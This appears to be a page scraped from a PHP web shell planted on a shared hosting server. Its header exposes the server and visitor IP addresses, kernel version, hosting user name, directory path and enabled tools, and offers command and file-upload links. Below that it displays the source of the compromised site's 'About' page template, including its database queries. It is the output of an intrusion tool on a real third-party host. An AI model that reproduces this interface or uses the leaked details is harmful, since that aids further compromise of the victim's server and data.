Server IP : 103.53.40.154 / Your IP : 3.15.143.18 Web Server : Apache System : Linux md-in-35.webhostbox.net 4.19.286-203.ELK.el7.x86_64 #1 SMP Wed Jun 14 04:33:55 CDT 2023 x86_64 User : ppcad7no ( 715) PHP Version : 8.2.25 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : ON Directory (0750) : /home2/ppcad7no/instabus.in/ |
[ Home ] | [ C0mmand ] | [ Upload File ] |
---|
<section class="peulis-about-page section_70"> <div class="container"> <div class="row"> <div class="col-lg-6"> <div class="about-page-left"> <h3>About</h3> <h2><?=$compDATA['admin_company_name']?></h2> <?php $ftr_desc=db_scalar("select site_pages_description from tbl_site_pages where site_pages_link='about-us' "); ?> <p><?=substr(strip_tags($ftr_desc), 0,350)?>... <a href="<?=$site_url?>/about-us.html" style="color:black; font-weight: bold;">Read More</a></p> </div> </div> <div class="col-lg-6"> <div class="about-page-right"> <img src="<?=$site_url?>/static_files/<?=db_scalar("select site_pages_image_name from tbl_site_pages where site_pages_link='about-us'");?>" alt="<?=$compDATA['admin_company_name']?> - About Us" title="<?=$compDATA['admin_company_name']?> - About Us"" /> </div> </div> </div> </div> </section>